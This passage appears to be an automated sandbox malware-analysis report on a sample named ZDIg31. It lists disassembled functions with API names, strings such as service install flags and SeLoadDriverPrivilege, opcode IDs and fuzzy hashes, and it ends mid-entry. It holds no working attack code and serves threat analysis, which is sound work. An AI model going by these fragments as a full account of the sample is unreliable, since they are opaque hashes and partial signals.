7ffe9b901498-7ffe9b9014a6 244->245 246 7ffe9b901438-7ffe9b90143b 244->246 247 7ffe9b9014a8-7ffe9b9014b5 call 7ffe9b901bcc 245->247 248 7ffe9b9014b6 245->248 249 7ffe9b901440-7ffe9b901449 246->249 247->248 248->204 250 7ffe9b90144b-7ffe9b901453 249->250 251 7ffe9b901455-7ffe9b901465 249->251 250->251 253 7ffe9b901467-7ffe9b90146e 251->253 254 7ffe9b901470-7ffe9b901496 251->254 253->254 254->245 254->249
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 73155330-0
                                      • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                      • Instruction ID: 67143e9a65675c086a9cee083f1d82ab0e5c25bb262067838de859b69dccba24
                                      • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                      • Instruction Fuzzy Hash: 10813962E296AA46E6218B3598001B9B794FF57BC8F148335FF59537B2DF3CE1928310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                      • String ID:
                                      • API String ID: 3526400053-0
                                      • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                      • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                      • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                      • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                      • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                      • API String ID: 3408796845-4213300970
                                      • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                      • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                      • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                      • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                      • String ID: ampStopSingletone: logging ended
                                      • API String ID: 2048888615-3533855269
                                      • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                      • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                      • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                      • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                      • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                      • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                      • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ErrorLastManagerOpen$FileModuleName
                                      • String ID: /remove$/service$vseamps
                                      • API String ID: 67513587-3839141145
                                      • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                      • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                      • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                      • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                      • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                      • GetProcAddress.KERNEL32 ref: 000000014000F117
                                        • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: AddressProc$Load$Library
                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                      • API String ID: 3981747205-232180764
                                      • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                      • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                      • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                      • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                      • String ID:
                                      • API String ID: 4284112124-0
                                      • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                      • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                      • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                      • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                      • String ID: vseamps
                                      • API String ID: 3693165506-3944098904
                                      • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                      • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                      • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                      • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: FileModuleName
                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                      • API String ID: 514040917-4022980321
                                      • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                      • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                      • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                      • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                      • String ID:
                                      • API String ID: 2057259594-0
                                      • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                      • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                      • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                      • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                      • String ID:
                                      • API String ID: 3103264659-0
                                      • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                      • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                      • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                      • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 3140674995-0
                                      • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                      • Instruction ID: 06a2d2ab2fad313958e5b441f21cca45dc63d8786ccebc9ea3708a364ca6c4ed
                                      • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                      • Instruction Fuzzy Hash: 16315D72A19B858AEB709FA0E8443ED7365FB85748F44413ADA4E47BB4DF38D648C720
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 1269745586-0
                                      • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                      • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                      • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                      • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                      • Instruction ID: a14222534d71ef2330c4448ccfc5b8f145f174a3ff9fe51efd83584c814620a0
                                      • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                      • Instruction Fuzzy Hash: 71316F32A28B8586DB60DF65E8402AE73A4FB89798F500136EA9D43B75DF3CD245CB10
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                      • String ID:
                                      • API String ID: 1445889803-0
                                      • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                      • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                      • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                      • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                      APIs
                                      • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                      • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                      • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                      • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                      • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContext
                                      • String ID:
                                      • API String ID: 2202868296-0
                                      • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                      • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                      • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                      • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3371073559.00007FFE9B901000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE9B900000, based on PE: true
                                      • Associated: 00000006.00000002.3371060448.00007FFE9B900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371090542.00007FFE9B912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371106197.00007FFE9B91D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.3371123656.00007FFE9B91F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffe9b900000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise_clrfp
                                      • String ID:
                                      • API String ID: 15204871-0
                                      • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                      • Instruction ID: 893f27b4d2576669bb5815a84fca933ece1ddf6771f9973dc3afefae7884ee8a
                                      • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                      • Instruction Fuzzy Hash: E3B14B73618B898BEB25CF2AC88636C3BA0F744F48F148921DA5D877B4CB3AD552D710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 203985260-0
                                      • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                      • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                      • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                      • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.3370998919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000006.00000002.3370983699.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371030537.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.3371045209.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_140000000_ZDIg31.jbxd
                                      Similarity
